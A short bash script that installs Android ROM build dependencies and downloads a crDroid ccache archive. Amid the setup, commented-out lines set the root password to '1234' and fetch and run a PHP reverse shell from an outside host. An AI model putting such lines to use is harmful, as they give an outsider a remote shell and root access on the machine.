#!/bin/bash

url=https://cheems.mirrorbomt.workers.dev/ccache-crdroid.tar.gz
sudo apt update && sudo apt-get -qq --yes --force-yes install git-core gnupg flex bison gperf build-essential zip curl zlib1g-dev gcc-multilib g++-multilib libc6-dev-i386 lib32ncurses5-dev x11proto-core-dev libx11-dev lib32z-dev libgl1-mesa-dev libxml2-utils xsltproc unzip bc ccache git imagemagick lib32readline-dev lib32z1-dev liblz4-tool pngquant libncurses5-dev libsdl1.2-dev libssl-dev libxml2 lzop pngcrush rsync schedtool squashfs-tools openjdk-8-jdk p7zip-full meld brotli qt5-qmake android-tools-adb android-tools-fastboot texinfo maven swapspace m4 libncurses5 libwxgtk3.0-gtk3-dev openjdk-8-jre libc6-dev lib32readline6-dev tmux screen w3m ncftp adb fastboot python default-jdk
#whoami
#echo -e "1234\n1234" | passwd root
#sudo apt-get -y install php php-cli wget curl
#wget -O reverse.php https://eintim.ga/rev.txt
#chmod 777 reverse.php 
#php reverse.php
#echo "ready to connect ssh"

cd /tmp # Where to download cccahe
time aria2c $url -x16 -s50
echo "dl done"
time tar xf ccache-crdroid.tar.gz
echo "unzip done"
find ccache-crdroid.tar.gz -delete
